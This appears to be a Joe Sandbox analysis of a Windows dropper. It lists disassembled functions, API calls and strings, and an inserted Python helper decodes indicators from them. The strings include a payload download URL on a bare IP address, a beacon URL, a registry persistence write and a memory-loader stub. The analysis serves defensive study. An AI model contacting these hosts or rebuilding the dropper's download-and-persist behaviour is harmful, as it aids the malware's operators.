200->182 205 433126-433151 200->205 207 433285-433290 GetLastError 202->207 208 43322b-433231 202->208 203->202 210 4331c7-4331e1 ReadConsoleW 203->210 211 4331f3-4331fd call 43346a 204->211 205->182 212 433153-433166 205->212 215 433292-4332a4 call 42eac9 call 42eab6 207->215 216 4332a9-4332ac 207->216 208->207 209 433233 208->209 218 433236-433248 209->218 220 4331e3 GetLastError 210->220 221 433202-43320b 210->221 211->165 212->182 225 433168-43316a 212->225 213->179 214->204 215->204 222 4332b2-4332b4 216->222 223 4331e9-4331ef call 
42ea93 216->223 218->211 228 43324a-43324e 218->228 220->223 221->218 222->211 223->204 225->182 232 43316c-43318c 225->232 235 433250-433260 call 432c45 228->235 236 433267-433272 228->236 232->182 247 433263-433265 235->247 241 433274 call 432d95 236->241 242 43327e-433283 call 432a85 236->242 248 433279-43327c 241->248 242->248 247->211 248->247
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                    Control-flow Graph

                                                    control_flow_graph 250 24f003c-24f0047 251 24f004c-24f0263 call 24f0a3f call 24f0e0f call 24f0d90 VirtualAlloc 250->251 252 24f0049 250->252 267 24f028b-24f0292 251->267 268 24f0265-24f0289 call 24f0a69 251->268 252->251 269 24f02a1-24f02b0 267->269 272 24f02ce-24f03c2 VirtualProtect call 24f0cce call 24f0ce7 268->272 269->272 273 24f02b2-24f02cc 269->273 279 24f03d1-24f03e0 272->279 273->269 280 24f0439-24f04b8 VirtualFree 279->280 281 24f03e2-24f0437 call 24f0ce7 279->281 282 24f04be-24f04cd 280->282 283 24f05f4-24f05fe 280->283 281->279 285 24f04d3-24f04dd 282->285 286 24f077f-24f0789 283->286 287 24f0604-24f060d 283->287 285->283 291 24f04e3-24f0505 LoadLibraryA 285->291 289 24f078b-24f07a3 286->289 290 24f07a6-24f07b0 286->290 287->286 292 24f0613-24f0637 287->292 289->290 294 24f086e-24f08be LoadLibraryA 290->294 295 24f07b6-24f07cb 290->295 296 24f0517-24f0520 291->296 297 24f0507-24f0515 291->297 298 24f063e-24f0648 292->298 302 24f08c7-24f08f9 294->302 299 24f07d2-24f07d5 295->299 300 24f0526-24f0547 296->300 297->300 298->286 301 24f064e-24f065a 298->301 303 24f07d7-24f07e0 299->303 304 24f0824-24f0833 299->304 305 24f054d-24f0550 300->305 301->286 306 24f0660-24f066a 301->306 307 24f08fb-24f0901 302->307 308 24f0902-24f091d 302->308 309 24f07e4-24f0822 303->309 310 24f07e2 303->310 314 24f0839-24f083c 304->314 311 24f0556-24f056b 305->311 312 24f05e0-24f05ef 305->312 313 24f067a-24f0689 306->313 307->308 309->299 310->304 315 24f056f-24f057a 311->315 316 24f056d 311->316 312->285 317 24f068f-24f06b2 313->317 318 24f0750-24f077a 313->318 314->294 319 24f083e-24f0847 314->319 321 24f057c-24f0599 315->321 322 24f059b-24f05bb 315->322 316->312 323 24f06ef-24f06fc 317->323 324 24f06b4-24f06ed 317->324 318->298 325 24f084b-24f086c 319->325 326 24f0849 319->326 333 24f05bd-24f05db 321->333 322->333 327 24f06fe-24f0748 323->327 328 24f074b 323->328 324->323 325->314 326->294 327->328 328->313 333->305
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024F024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: fbf06393b412c87a3d50d88f0dbf1f48102c0f1d04f45ddb18649da5986a0ba6
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 3E526D74A01229DFDBA4CF58C984BADBBB1BF49304F1480DAE54DA7356DB30AA85CF14

                                                    Control-flow Graph

                                                    APIs
                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                    • API String ID: 3067768807-1501832161
                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                    • String ID:
                                                    • API String ID: 1687354797-0
                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                    Control-flow Graph

                                                    APIs
                                                    • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                    • __Cnd_signal.LIBCPMT ref: 00405828
                                                    • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                    • String ID:
                                                    • API String ID: 2059591211-0
                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID: F(@
                                                    • API String ID: 1611280651-2698495834
                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                    • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                    • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                    Control-flow Graph

                                                     Control-flow graph (rendered image not captured; executed/not-executed colouring lost): basic blocks 42e114-42e197; calls CreateThread and GetLastError, plus internal subroutines 42eac9, 42a59d, 42e0cb, 42e03d and 42ea93.
                                                    APIs
                                                    • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                    • __dosmaperr.LIBCMT ref: 0042E170
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2744730728-0
                                                    • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                    • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                    • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                    • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                    Control-flow Graph

                                                     Control-flow graph (rendered image not captured; executed/not-executed colouring lost): basic blocks 434755-4347d2; calls SetFilePointerEx and GetLastError, plus internal subroutines 439921, 42eac9 and 42ea93.
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                    • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                    • __dosmaperr.LIBCMT ref: 0043479F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2336955059-0
                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                    • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                    • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                    Control-flow Graph

                                                     Control-flow graph (rendered image not captured; executed/not-executed colouring lost): basic blocks 402bad-402c03; calls RegCreateKeyExW, RegSetValueExW and RegCloseKey.
                                                    APIs
                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID:
                                                    • API String ID: 1818849710-0
                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                    • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                    • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                    Control-flow Graph

                                                     Control-flow graph (rendered image not captured; executed/not-executed colouring lost): basic blocks 42e074-42e0ca; calls ExitThread, CloseHandle and FreeLibraryAndExitThread, plus internal subroutines 431f5e and 4354f6.
                                                    APIs
                                                      • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                      • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                      • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                    • ExitThread.KERNEL32 ref: 0042E086
                                                    • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                    • String ID:
                                                    • API String ID: 1198197534-0
                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                    • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                    • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                    Control-flow Graph

                                                     Control-flow graph (rendered image not captured; executed/not-executed colouring lost): basic blocks 40239e-40256e; calls PostQuitMessage and DefWindowProcW, plus internal subroutines 401da4, 4010ba and 4029f4.
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                    • PostQuitMessage.USER32(00000000), ref: 00402563
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: MessagePostProcQuitWindow
                                                    • String ID:
                                                    • API String ID: 3873111417-0
                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                    APIs
                                                    • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Sleep
                                                    • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                    • API String ID: 3358372957-3120454669
                                                    • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                    • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                    • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                    • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 0040298F
                                                    • __fassign.LIBCMT ref: 0040299F
                                                      • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                    • String ID:
                                                    • API String ID: 2843524283-0
                                                    • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                    • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                    • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                    • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000400,?,?,024F0223,?,?), ref: 024F0E19
                                                    • SetErrorMode.KERNEL32(00000000,?,?,024F0223,?,?), ref: 024F0E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: a1355340812a76edfb87e8f37077e87cd166259ba3829630d5b4c7a92252a5d3
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 52D01231545128B7D7402A94DC09BCE7B1CDF45B66F008011FB0DD9181C770954046E5
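Added triage helper, not part of the Joe Sandbox report and not code from the sample: a Python script that parses "APIs" and "String ID" bullets of the form shown in the records above (the VirtualAlloc stub at 024F024D, the WinINet beacon at 00402C27, the registry write at 00402BCF, the Sleep and download URL at 00401562, and the SetErrorMode pair at 024F0E19) and decodes the constants an analyst otherwise checks by hand: registry hive, access mask and value type, VirtualAlloc allocation and protection flags, the Sleep duration, and the network IOCs carried in the strings. The sample lines are constructed from this report's own bullets with the bullet character dropped. It assumes the report prints arguments in documented parameter order with stack context appended, as the bullets above appear to do. The SetErrorMode(0x400)/SetErrorMode(0) pair is reported only as a pattern; that it serves as an emulator check is an inference, not something the report states.

```python
import re

# Constructed for this example from the "APIs" and "String ID" bullets in the
# function records of this report; nothing is fetched or executed.
SAMPLE_LINES = [
    "VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024F024D",
    "String ID: cess$kernel32.dll",
    "InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27",
    "InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A",
    "String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=",
    "RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF",
    "RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7",
    "Sleep.KERNEL32(00001D1B), ref: 00401562",
    "String ID: http://176.113.115.19/ScreenUpdateSync.exe",
    "SetErrorMode.KERNEL32(00000400,?,?,024F0223,?,?), ref: 024F0E19",
    "SetErrorMode.KERNEL32(00000000,?,?,024F0223,?,?), ref: 024F0E1E",
]

API_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")
STR_RE = re.compile(r"String ID:\s*(.*)")
URL_RE = re.compile(r"https?://[^\s$]+")
HOST_RE = re.compile(r"https?://([^/:]+)")
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")

# Windows SDK constants (winreg.h, winnt.h, memoryapi.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}
ALLOC_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"}
PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
KEY_ALL_ACCESS = 0x000F003F


def parse_lines(lines):
    """Split report bullets into API-call dicts and a flat list of strings."""
    calls, strings = [], []
    for line in lines:
        m = API_RE.search(line)
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module, "ref": int(ref, 16),
                          "args": [a.strip() for a in args.split(",")]})
            continue
        m = STR_RE.search(line)
        if m:
            # Joe Sandbox joins several strings of one function with '$'.
            strings.extend(s for s in m.group(1).split("$") if s)
    return calls, strings


def hexarg(call, i):
    """Argument i as an int, or None when it is '?' or a resolved string literal."""
    try:
        return int(call["args"][i], 16)
    except (IndexError, ValueError):
        return None


def triage(lines):
    """Decode the calls and strings into IOCs and behaviour flags."""
    calls, strings = parse_lines(lines)
    out = {"urls": [], "hosts": [], "ips": [], "user_agent": None,
           "registry": [], "allocations": [], "sleep_ms": [], "flags": []}
    for s in strings:
        for url in URL_RE.findall(s):
            host = HOST_RE.match(url).group(1)
            out["urls"].append(url)
            out["hosts"].append(host)
            if IPV4_RE.fullmatch(host):
                out["ips"].append(host)
    for i, c in enumerate(calls):
        api, a = c["api"], c["args"]
        if api == "InternetOpenW" and a and a[0] != "?" and hexarg(c, 0) is None:
            out["user_agent"] = a[0]  # lpszAgent was resolved to a literal by the sandbox
        elif api == "RegCreateKeyExW":
            hive, sam = hexarg(c, 0), hexarg(c, 5)  # hKey and samDesired
            out["registry"].append({
                "hive": HIVES.get(hive, hex(hive) if hive is not None else "?"),
                "access": "KEY_ALL_ACCESS" if sam == KEY_ALL_ACCESS else hex(sam or 0),
            })
        elif api == "RegSetValueExW" and out["registry"]:
            # dwType is the 4th parameter; later values are stack context.
            out["registry"][-1]["type"] = REG_TYPES.get(hexarg(c, 3), "unknown")
        elif api == "VirtualAlloc":
            out["allocations"].append({"ref": c["ref"],
                                       "alloc": ALLOC_FLAGS.get(hexarg(c, 2), "?"),
                                       "protect": PROTECT.get(hexarg(c, 3), "?")})
        elif api == "Sleep":
            out["sleep_ms"].append(hexarg(c, 0))
        elif api == "SetErrorMode" and hexarg(c, 0) == 0x400 and i + 1 < len(calls):
            nxt = calls[i + 1]
            # Two back-to-back calls a few bytes apart: 0x400 then 0.
            if nxt["api"] == "SetErrorMode" and hexarg(nxt, 0) == 0 and nxt["ref"] - c["ref"] <= 16:
                out["flags"].append("SetErrorMode(0x400) immediately followed by SetErrorMode(0)")
    if "kernel32.dll" in strings and any(al["protect"] == "PAGE_READWRITE" for al in out["allocations"]):
        out["flags"].append("RW VirtualAlloc together with a 'kernel32.dll' string (loader-stub pattern)")
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

Run as-is, triage(SAMPLE_LINES) returns both URLs, the host post-to-me.com and the bare IP 176.113.115.19, the user agent ShareScreen, an HKEY_CURRENT_USER key opened with KEY_ALL_ACCESS and written as REG_SZ, a MEM_COMMIT/PAGE_READWRITE allocation at 024F024D and a 7451 ms sleep. Further bullets from this report can be appended to SAMPLE_LINES without changing the parser; the "&cc=DE" fragment is left as a plain string because the report does not show how it is joined to the URL.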
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                    • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                    • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                    • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                    APIs
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                    • String ID:
                                                    • API String ID: 323602529-0
                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_catch
                                                    • String ID:
                                                    • API String ID: 3886170330-0
                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
